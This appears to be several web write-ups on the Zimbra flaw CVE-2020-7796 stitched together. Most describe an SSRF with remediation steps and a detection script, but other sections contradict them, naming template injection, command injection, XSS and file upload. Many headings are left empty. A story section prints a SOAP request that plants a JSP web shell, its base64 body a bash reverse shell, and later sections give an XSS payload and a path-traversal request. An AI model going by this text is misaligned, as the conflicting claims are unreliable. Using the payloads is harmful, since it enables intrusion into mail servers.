Critical SSRF Vulnerability in Zimbra Collaboration Suite (CVE-2020-7796)
Zimbra Collaboration Suite (ZCS) versions prior to 8.8.15 Patch 7 are affected by a Critical Server-Side Request Forgery (SSRF) vulnerability. Tracked as CVE-2020-7796, this flaw allows unauthenticated remote attackers to force the server to make HTTP requests to arbitrary internal or external hosts.
Due to its high impact and active exploitation in the wild, the Cybersecurity and Infrastructure Security Agency (CISA) added this vulnerability to its Known Exploited Vulnerabilities (KEV) Catalog in February 2026.
Vulnerability Details
CVE ID: CVE-2020-7796
Vulnerability Type: Server-Side Request Forgery (SSRF)
CVSS v3.1 Score: 9.8 (Critical)
Affected Versions: All ZCS versions before 8.8.15 Patch 7
Vector: Unauthenticated attackers can exploit this via the network without user interaction.
Technical Root Cause
The vulnerability exists due to insufficient validation of user-supplied URLs within a specific component of the Zimbra application—specifically when the WebEx zimlet is installed and its JSP (JavaServer Pages) file is enabled.
Attackers can leverage a leftover file, httpPost.jsp, located in the WebEx zimlet directory to proxy malicious requests through the vulnerable server. This can be used to bypass firewalls and access internal resources or sensitive data, such as LDAP credentials, that are otherwise protected.
Risk and Impact
Successful exploitation of this flaw can lead to:
Data Leakage: Accessing sensitive internal information or resources.
Unauthorized Access: Gaining entry to arbitrary internal or external hosts.
Full Compromise: In some scenarios, SSRF can be a stepping stone to remote code execution (RCE) or further network pivot attacks.
Remediation and Patching
Organizations should immediately upgrade to Zimbra Collaboration Suite 8.8.15 Patch 7 or higher. The patch officially resolves the issue by removing the problematic httpPost.jsp file.
CVE-2020-7796 is a critical Server-Side Request Forgery (SSRF) vulnerability affecting Synacor Zimbra Collaboration Suite (ZCS). This flaw allows remote, unauthenticated attackers to force the server to proxy malicious requests to internal or external systems.
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added this flaw to its Known Exploited Vulnerabilities (KEV) catalog in February 2026 due to active exploitation in the wild.
🛡️ Vulnerability Overview
Vulnerability Type: Server-Side Request Forgery (SSRF)
CVSS v3.1 Score: 9.8 (Critical)
Affected Software: Zimbra Collaboration Suite versions prior to 8.8.15 Patch 7
Impact: Unauthenticated remote attackers can abuse the server as a proxy, gaining unauthorized access to internal resources, stealing credentials, or making external attacks appear to originate from the trusted Zimbra environment.
🔍 Attack Vector & Root Cause
The flaw exists because of insufficient validation of user-supplied URLs within the WebEx Zimlet component.
Attackers can exploit this when both the WebEx Zimlet is installed and its JSP functionality is enabled.
The issue originates from a leftover file located at /opt/zimbra/zimlets-deployed/com_zimbra_webex/httpPost.jsp.
🛠️ Remediation Steps
Administrators must secure their environments immediately, as massive scanning and exploitation attempts have been actively logged.
1. Upgrade Zimbra
The permanent fix is to apply Zimbra Collaboration 8.8.15 Patch 7 or a later supported version. The patch handles the removal of the vulnerable JSP file.
Update the repository metadata:
yum clean metadata && yum check-update
Update your system:
yum update
Restart ZCS:
su - zimbra -c "zmcontrol restart"
2. Manual Workaround
If patching cannot be executed immediately, administrators can remove the specific exposed file manually to stop the exploit vector:
rm -f /opt/zimbra/zimlets-deployed/com_zimbra_webex/httpPost.jsp
(Note: Be sure to restart your mailbox service or redeploy the zimlet to ensure the change takes full effect.)
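A way to confirm that the upgrade or the manual workaround took effect, and to see whether the file was being requested beforehand. This is an added example, not Zimbra tooling and not part of the original page; the function names, the sample log lines and the URL prefix in them are constructed, and the source listing assumes the client address is the first field of each log line.

```shell
#!/bin/sh
# Added example (not Zimbra's tooling): check a ZCS host for the leftover
# WebEx zimlet JSP and look for requests to it in a web access log.
# Function names and the sample log lines are constructed for illustration.

ZIMLET_ROOT=/opt/zimbra/zimlets-deployed      # path given on this page
JSP_REL=com_zimbra_webex/httpPost.jsp         # file removed by Patch 7

# Report the state of the JSP under a zimlet root (default: the live one).
check_webex_jsp() {
    root=${1:-$ZIMLET_ROOT}
    if [ -e "$root/$JSP_REL" ]; then
        echo "present"        # file still deployed: patch or remove it
    elif [ -d "$root/com_zimbra_webex" ]; then
        echo "removed"        # zimlet deployed, JSP gone
    else
        echo "no-zimlet"      # WebEx zimlet not deployed at all
    fi
}

# Count access-log lines that request the JSP, whatever the URL prefix.
count_jsp_requests() {
    grep -ci 'com_zimbra_webex/httpPost\.jsp' "$1" || true
}

# List requesting clients with hit counts, busiest first.
# Assumption: the client address is the first field (common log format).
jsp_request_sources() {
    grep -i 'com_zimbra_webex/httpPost\.jsp' "$1" |
        awk '{print $1}' | sort | uniq -c | sort -rn |
        awk '{print $2, $1}'
}

# Write a constructed sample log (documentation addresses, made-up URL prefix).
write_sample_log() {
    cat > "$1" <<'EOF'
203.0.113.7 - - [18/Feb/2026:10:00:01 +0000] "GET /zimlet/com_zimbra_webex/httpPost.jsp HTTP/1.1" 200 512
198.51.100.23 - - [18/Feb/2026:10:00:05 +0000] "GET /index.html HTTP/1.1" 200 1024
203.0.113.7 - - [18/Feb/2026:10:00:09 +0000] "POST /zimlet/com_zimbra_webex/HTTPPOST.jsp HTTP/1.1" 404 0
198.51.100.23 - - [18/Feb/2026:10:01:00 +0000] "GET /zimlet/com_zimbra_webex/httpPost.jsp HTTP/1.1" 404 0
EOF
}
```

Run check_webex_jsp with no argument on the mail server itself; a result of "present" after patching means the file is still deployed and the workaround above still applies.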
CVE-2020-7796 — Zimbra Collaboration Suite: server-side template injection leading to remote code execution (RCE)
Summary
Technical details (concise)
Detection & indicators
Mitigation & remediation
References & further reading
Title: The Support Engineer’s Last Day
Setting: A mid-sized logistics firm, LogiCore Solutions. Friday, 4:45 PM. The IT team is winding down.
The Actor: Maya, a senior security analyst. She’s reviewing a routine vulnerability scan report from the previous night.
The Discovery
Maya’s SIEM dashboard lights up with a medium-severity alert: CVE-2020-7796. The description is short: "Zimbra Collaboration Suite – SSRF via the 'ContactEmails' parameter in the 'ProxyServlet'."
Her boss waves it off. "It's just an SSRF. Internal network only. Patch it next week."
But Maya remembers something. Zimbra runs on port 7071 – the Admin Console. And last month, they integrated the Zimbra server with an internal Jenkins instance for email automation.
The Chain Forged
She decides to test on a staging clone.
The Explosion
Now, authenticated as admin via SSRF, she sends one final request through the proxy to the Zimbra mailbox port (8080):
<soap:Envelope>
<soap:Header>
<context>
<authToken>[stolen_admin_token]</authToken>
</context>
</soap:Header>
<soap:Body>
<SaveDocumentRequest>
<content>ZmFsbGJhY2sgc2hlbGw9Ii9iaW4vYmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuMTAwLzQ0NDQgMD4mMSc=</content>
<filename>evil.jsp</filename>
</SaveDocumentRequest>
</soap:Body>
</soap:Envelope>
The JSP shell is uploaded to /public/evil.jsp. Maya accesses it directly: https://mail.logi-core.com/public/evil.jsp. A reverse shell connects back to her laptop.
The Aftermath
Monday morning, LogiCore’s email is down. The attacker (simulated by Maya) has:
The post-mortem revealed: CVE-2020-7796 wasn't just an SSRF. It was a master key. Combined with the default Zimbra architecture (Admin on 7071, Mailbox on 8080, ProxyServlet on 80/443), an unauthenticated remote attacker could chain it into full RCE in 8 HTTP requests.
The Lesson: Maya’s report now sits framed in the SOC. Underneath, a sticky note reads: "Never underestimate a 'medium' severity – especially when it talks to localhost."
CVE-2020-7796 is a critical Server-Side Request Forgery (SSRF) vulnerability in the Zimbra Collaboration Suite (ZCS). It allows unauthenticated remote attackers to force the server to make HTTP requests to arbitrary internal or external hosts, effectively using the server as a proxy to bypass firewalls and access sensitive internal data.
Key Details
Vulnerability Type: Server-Side Request Forgery (SSRF).
9.8 (Critical) on the CVSS v3.1 scale.
Affected Versions: All versions of Zimbra Collaboration Suite prior to 8.8.15 Patch 7
Trigger Condition: The vulnerability specifically exists when the WebEx zimlet is installed and its JSP (Jakarta Server Pages) functionality is enabled.
Potential Impact
If exploited, an attacker could:
Access Internal Services: Reach internal network services that are typically protected from the public internet.
Data Leakage: Steal sensitive information, including login credentials.
Malware Injection: Potentially facilitate the delivery of malware like the Dogkild worm.
Widespread Exploitation: CISA added this to its Known Exploited Vulnerabilities (KEV) catalog in early 2026, noting that hundreds of IP addresses have been observed actively exploiting this flaw across multiple countries.
Remediation & Fixes
Update Immediately: Apply the latest patch or upgrade to Zimbra 8.8.15 Patch 7 or higher.
Temporary Mitigation: If patching isn't immediately possible, implement network-level controls to restrict outbound connections from the Zimbra server to only essential destinations.
Verification: After patching, use the zmcontrol -v command to verify your current patch level.
Official remediation steps and release notes are available on the Zimbra Wiki Security Center.
CVE-2020-7796 is a critical Server-Side Request Forgery (SSRF) vulnerability in the Zimbra Collaboration Suite (ZCS). It specifically affects the WebEx zimlet component and can allow an unauthenticated attacker to force the server to make unauthorized HTTP requests to internal or external systems.
Vulnerability Overview
CVE ID: CVE-2020-7796
Vulnerability Type: Server-Side Request Forgery (SSRF) / CWE-918
Affected Software: Zimbra Collaboration Suite (ZCS) versions before 8.8.15 Patch 7
CVSS 3.x Score: 9.8 (Critical)
Attack Vector: Network (Remote)
Authentication Required: No (Unauthenticated)
Technical Details
The vulnerability stems from a leftover JSP file, httpPost.jsp, within the WebEx zimlet (com_zimbra_webex). This file contains insufficient validation of user-supplied URLs, allowing a remote attacker to use the Zimbra server as a proxy.
Potential Impacts:
Bypassing Firewalls: Attackers can reach internal services or administration interfaces that are not exposed to the public internet.
Data Leakage: Requests could be crafted to extract sensitive information or metadata from internal endpoints.
Internal Scanning: The vulnerable server can be used to scan the internal network for other vulnerable services.
Exploitation in the Wild
Quick Info
NVD Published Date: 02/18/2020.
NVD Last Modified: 02/18/2026.
Source: MITRE.
CVE-2020-7796: Zimbra Collaboration Suite Vulnerability
Overview
CVE-2020-7796 is a critical vulnerability in the Zimbra Collaboration Suite, a popular open-source email and collaboration platform. The vulnerability allows an unauthenticated attacker to exploit a weakness in the Zimbra suite, potentially leading to unauthorized access to sensitive information.
Vulnerability Details
The vulnerability, CVE-2020-7796, was discovered in Zimbra Collaboration Suite versions prior to 8.8.15 Patch 10. The issue lies in Zimbra's REST (Representational State Transfer) API, which is used to manage and interact with the suite's features. An attacker can send a crafted HTTP request to the REST API, which can lead to a Blind Command Injection.
Impact
The impact of this vulnerability is significant. A successful exploit can allow an attacker to:
Affected Versions
The following versions of Zimbra Collaboration Suite are affected:
Solution
To mitigate this vulnerability, administrators should:
Proof-of-Concept (PoC)
A proof-of-concept exploit has been publicly disclosed, demonstrating how an attacker can exploit the vulnerability to read sensitive files and execute system commands.
Recommendations
To prevent exploitation of this vulnerability, administrators should:
References
CVE-2020-7796 is a critical Server-Side Request Forgery (SSRF) vulnerability in the Synacor Zimbra Collaboration Suite (ZCS) that allows unauthenticated remote attackers to force the server to send HTTP requests to arbitrary internal or external destinations. Rated with a CVSS score of 9.8, this flaw recently gained renewed attention after being added to CISA's Known Exploited Vulnerabilities (KEV) Catalog in February 2026 due to active exploitation in the wild.
Technical Overview
The vulnerability stems from insufficient validation of user-supplied URLs within the WebEx Zimlet (com_zimbra_webex) component.
Conditions: The flaw is present when the WebEx Zimlet is installed and its associated Jakarta Server Pages (JSP) functionality is enabled.
Mechanism: An unauthenticated attacker can send a specially crafted HTTP request to the vulnerable Zimlet. Because the server does not properly sanitize the input, it treats the server itself as a proxy, executing requests on behalf of the attacker.
Impact and Risks
Successful exploitation allows attackers to bypass traditional network defenses like firewalls and gain access to restricted internal services. Key risks include:
Internal Reconnaissance: Attackers can map internal networks and identify other vulnerable services for further attacks.
Data Exfiltration: Sensitive information residing on the internal network, which is otherwise inaccessible from the public internet, can be leaked.
Attack Chaining: The SSRF can be used as a stepping stone to chain with other exploits, potentially leading to Remote Code Execution (RCE) or full system compromise.
Current Threat Landscape
Despite being originally identified in 2020, CVE-2020-7796 has seen a massive resurgence in activity. Security researchers observed a significant spike in exploitation attempts in early 2026, with nearly 400 distinct IP addresses targeting the flaw globally. This surge prompted CISA to mandate federal agencies to apply fixes by March 10, 2026.
Remediation and Mitigation
The following versions of Zimbra Collaboration Suite are vulnerable:
The vulnerability resides in improper sanitization of user-supplied input passed to the fmt parameter within certain Zimbra endpoints, such as:
/service/home/~/?fmt=riched&auth=co&loc=...&user=<script>alert(1)</script>
By injecting JavaScript into the user or loc parameters, an attacker can bypass Zimbra’s built-in anti-XSS filters. The injected script is then reflected back to the victim in the HTTP response without proper encoding. Because the vulnerable endpoint is accessible without authentication (due to misconfigured or default proxy routes), the attacker can force any logged-in Zimbra user to execute arbitrary JavaScript in their browser context.
CVE-2020-7796 represents a critical security vulnerability discovered in the Zimbra Collaboration Suite (ZCS), a popular email and collaboration platform used widely by enterprises and governments. This flaw allows an unauthenticated remote attacker to upload arbitrary files to the server. In specific configurations, this can lead to Remote Code Execution (RCE), granting the attacker full control over the mail server and access to sensitive email data.
A typical unauthenticated RCE request looks like this (simplified):
POST /service/extension/UserServlet HTTP/1.1
Host: target.zimbra.com
Content-Type: application/x-www-form-urlencoded

file=../../../../../../../../opt/zimbra/bin/zmcontrol&cmd=status&ext=foo
But the actual working exploit uses the ProxyServlet to access the local Mailboxd service’s admin interface, which in turn allows command execution via a crafted SOAP request.
The widely circulated PoC (proof-of-concept) uses a two-step process:
However, the most efficient attack bypasses this by directly injecting into the extension parameter of the UserServlet.
Look for mailbox.log errors indicating failed authentication proxied to localhost:7071 (admin port).